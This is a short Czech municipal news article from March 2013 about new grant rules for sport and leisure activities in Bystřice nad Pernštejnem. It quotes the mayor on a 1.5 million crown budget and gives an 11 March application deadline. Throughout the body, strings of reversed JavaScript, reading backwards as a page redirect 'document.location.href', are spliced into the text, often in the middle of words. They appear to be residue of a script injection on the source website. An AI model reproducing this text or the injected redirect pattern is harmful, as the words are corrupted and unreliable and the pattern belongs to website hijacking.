Bystřice nad Pernštejnem, bystrice nad pernstejnem, aktuality, granty
Rainbow page separator

Bystřičtí schválili granty

Sobota, 2. března 2013

Bystřice nad Pernštejnem / Nové zásady a pravidla pro rozdělování finančních prostředků pro sport a volnočasové aktivity schválili radní v Bystřici nad Pernštejnem. Le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošní novinkou je rozdělení žádostí na pravidelné aktivity a jednorázové akce. Na jednorázové spor[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovní a volnočasové akce měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to hodlá vydat s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to tisíc, přičemž jeden příspěvek může být až dvacet tisíc korun. U pravidelných aktivit je částka, kterou je možné od města získat, podstatně vyšší. „Pro rok 2013 stanovilo zastupitelstvo města celkovou částku na grant spor[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovních a volnočasových aktivit ve výši 1,5 milionu korun,“ informoval bystřický starosta Karel Pačiska. Konečná výše poskytnuté částky se odvíjí od zásad pro výpočet dotace, což je spojeno s velikostí členské základny, nájmem i majetkem organizace.

Žádosti o granty města, jejichž podmínky i formuláře jsou umístěny na webových stránkách Bystřice, je možné podávat do 11. března.